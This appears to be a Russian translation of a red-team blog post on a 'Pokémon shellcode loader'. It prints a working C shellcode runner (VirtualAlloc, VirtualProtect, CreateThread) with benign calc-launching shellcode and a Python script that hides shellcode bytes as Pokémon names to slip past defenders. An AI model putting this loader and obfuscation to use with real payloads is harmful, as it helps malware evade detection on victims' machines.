
Устали весь день смотреть на hex и вылавливать '\x41'? Предпочитаете смотреть на Лугию/Чармандера? У меня есть решение для вас.
Надоело смотреть на hex целыми днями и вставлять '\x41'? Хочется вместо этого смотреть на Лугию/Чармандера? У меня есть решение. В твите от @Checkymander прозвучала идея создать загрузчик шеллкода из имён покемонов. Отличный весёлый проект, чтобы подшутить над синей командой, но POC не было! (или, по крайней мере, когда я проверял в последний раз)
Примечание №1 Обновлённый код будет на моём GitHub: https://github.com/Techryptic/Pokemon-Shellcode-Loader
Примечание №2 GitBooks: https://techryptic.gitbook.io/pokemon-shellcode
Примечание №3 GitPages: https://techryptic.github.io/2022/07/28/Pokemon-Shellcode-Loader
Есть несколько способов сделать это: Если посмотреть на шеллкод, то это последовательность hex-значений от 0x00 до 0xFF, или в десятичной форме от 0 до 256. Покемонов, из которых можно выбирать, гораздо больше, чем 256.
Глядя на таблицу покемонов выше, мы можем перевести BULBASAUR, который является #001, в 0x01 (отбрасывая первый ноль). Аналогично CHARMANDER будет представлен как 0x04 и так далее. Счастливый нулевой байт 0x00 можно сопоставить с покемоном #257 — BLAZIKEN!
Преобразовать шеллкод в Pokemon-Shellcode просто. А как насчёт преобразования Pokemon-Shellcode обратно в ассемблер?! Хотим ли мы массив внутри .ASM? C-код? Скачивать его внешне?
Есть много направлений!
Нам нужны данные. Сначала я нашёл два источника, где есть и номер покемона, и его имя:
https://gist.github.com/armgilles/194bcff35001e7eb53a2a8b441e8b2c6
И ещё один, где есть только имена покемонов. Он может быть полезнее, потому что мы можем получить индексную позицию массива для конкретного покемона без необходимости таскать за собой длинную строку.
https://github.com/sindresorhus/pokemon/blob/main/data/en.json
Я беру обычный POP CALC шеллкод и добавляю немного C.
#include <windows.h>
void main() {
void* exec;
BOOL rv;
HANDLE th;
DWORD oldprotect = 0;
// Shellcode
unsigned char payload[] =
"\x50\x53\x51\x52\x56\x57\x55\x89"
"\xe5\x83\xec\x18\x31\xf6\x56\x6a"
"\x63\x66\x68\x78\x65\x68\x57\x69"
"\x6e\x45\x89\x65\xfc\x31\xf6\x64"
"\x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b"
"\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10"
"\x89\x5d\xf8\x31\xc0\x8b\x43\x3c"
"\x01\xd8\x8b\x40\x78\x01\xd8\x8b"
"\x48\x24\x01\xd9\x89\x4d\xf4\x8b"
"\x78\x20\x01\xdf\x89\x7d\xf0\x8b"
"\x50\x1c\x01\xda\x89\x55\xec\x8b"
"\x58\x14\x31\xc0\x8b\x55\xf8\x8b"
"\x7d\xf0\x8b\x75\xfc\x31\xc9\xfc"
"\x8b\x3c\x87\x01\xd7\x66\x83\xc1"
"\x08\xf3\xa6\x74\x0a\x40\x39\xd8"
"\x72\xe5\x83\xc4\x26\xeb\x41\x8b"
"\x4d\xf4\x89\xd3\x8b\x55\xec\x66"
"\x8b\x04\x41\x8b\x04\x82\x01\xd8"
"\x31\xd2\x52\x68\x2e\x65\x78\x65"
"\x68\x63\x61\x6c\x63\x68\x6d\x33"
"\x32\x5c\x68\x79\x73\x74\x65\x68"
"\x77\x73\x5c\x53\x68\x69\x6e\x64"
"\x6f\x68\x43\x3a\x5c\x57\x89\xe6"
"\x6a\x0a\x56\xff\xd0\x83\xc4\x46"
"\x5d\x5f\x5e\x5a\x59\x5b\x58\xc3";
unsigned int payload_len = 205;
exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(exec, payload, payload_len);
rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect);
th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(th, -1);
}
Неплохо. Он ничего вредоносного не делает, но всё равно... неплохо.
Простой скрипт преобразует байтовый объект шеллкода в Pokémon Shellcode.
import json
shellcode = (b"\x41\x42\x20\x43")
#Do not edit below
PokemonList = ["Missingno","Bulbasaur","Ivysaur","Venusaur","Charmander","Charmeleon","Charizard","Squirtle","Wartortle","Blastoise","Caterpie","Metapod","Butterfree","Weedle","Kakuna","Beedrill","Pidgey","Pidgeotto","Pidgeot","Rattata","Raticate","Spearow","Fearow","Ekans","Arbok","Pikachu","Raichu","Sandshrew","Sandslash","NidoranF","Nidorina","Nidoqueen","NidoranM","Nidorino","Nidoking","Clefairy","Clefable","Vulpix","Ninetales","Jigglypuff","Wigglytuff","Zubat","Golbat","Oddish","Gloom","Vileplume","Paras","Parasect","Venonat","Venomoth","Diglett","Dugtrio","Meowth","Persian","Psyduck","Golduck","Mankey","Primeape","Growlithe","Arcanine","Poliwag","Poliwhirl","Poliwrath","Abra","Kadabra","Alakazam","Machop","Machoke","Machamp","Bellsprout","Weepinbell","Victreebel","Tentacool","Tentacruel","Geodude","Graveler","Golem","Ponyta","Rapidash","Slowpoke","Slowbro","Magnemite","Magneton","Farfetchd","Doduo","Dodrio","Seel","Dewgong","Grimer","Muk","Shellder","Cloyster","Gastly","Haunter","Gengar","Onix","Drowzee","Hypno","Krabby","Kingler","Voltorb","Electrode","Exeggcute","Exeggutor","Cubone","Marowak","Hitmonlee","Hitmonchan","Lickitung","Koffing","Weezing","Rhyhorn","Rhydon","Chansey","Tangela","Kangaskhan","Horsea","Seadra","Goldeen","Seaking","Staryu","Starmie","Mr. Mime","Scyther","Jynx","Electabuzz","Magmar","Pinsir","Tauros","Magikarp","Gyarados","Lapras","Ditto","Eevee","Vaporeon","Jolteon","Flareon","Porygon","Omanyte","Omastar","Kabuto","Kabutops","Aerodactyl","Snorlax","Articuno","Zapdos","Moltres","Dratini","Dragonair","Dragonite","Mewtwo","Mew","Chikorita","Bayleef","Meganium","Cyndaquil","Quilava","Typhlosion","Totodile","Croconaw","Feraligatr","Sentret","Furret","Hoothoot","Noctowl","Ledyba","Ledian","Spinarak","Ariados","Crobat","Chinchou","Lanturn","Pichu","Cleffa","Igglybuff","Togepi","Togetic","Natu","Xatu","Mareep","Flaaffy","Ampharos","Bellossom","Marill","Azumarill","Sudowoodo","Politoed","Hoppip","Skiploom","Jumpluff","Aipom","Sunkern","Sunflora","Yanma","Wooper","Quagsire","Espeon","Umbreon","Murkrow","Slowking","Misdreavus","Unown","Wobbuffet","Girafarig","Pineco","Forretress","Dunsparce","Gligar","Steelix","Snubbull","Granbull","Qwilfish","Scizor","Shuckle","Heracross","Sneasel","Teddiursa","Ursaring","Slugma","Magcargo","Swinub","Piloswine","Corsola","Remoraid","Octillery","Delibird","Mantine","Skarmory","Houndour","Houndoom","Kingdra","Phanpy","Donphan","Porygon2","Stantler","Smeargle","Tyrogue","Hitmontop","Smoochum","Elekid","Magby","Miltank","Blissey","Raikou","Entei","Suicune","Larvitar","Pupitar","Tyranitar","Lugia","Ho-Oh","Celebi","Treecko","Grovyle","Sceptile","Torchic"]
Poke_Shellcode = []
for x in shellcode:
Poke_Shellcode.append(PokemonList[x])
print(json.dumps(Poke_Shellcode))
Взяв шеллкод выше:
\x00\x31\xc0\x50\x68\x2f\x2F
Преобразуется в:
Забавный факт: я хотел сохранить соответствие имени покемона его номеру (BULBASAUR = #1, или 0x01), поэтому нужно было чем-то заполнить 0x00/нулевой байт. Что подходит лучше, чем MISSINGNO?!
Ещё одна проблема в том, что у покемона Farfetch'd есть апостроф, как показано ниже. Простое решение — убрать его и назвать: Farfetchd
Наконец, есть также два покемона, чьи имена совпадают после удаления символов. Решение для этих двух — добавить F (female) одному, а другому — M (male).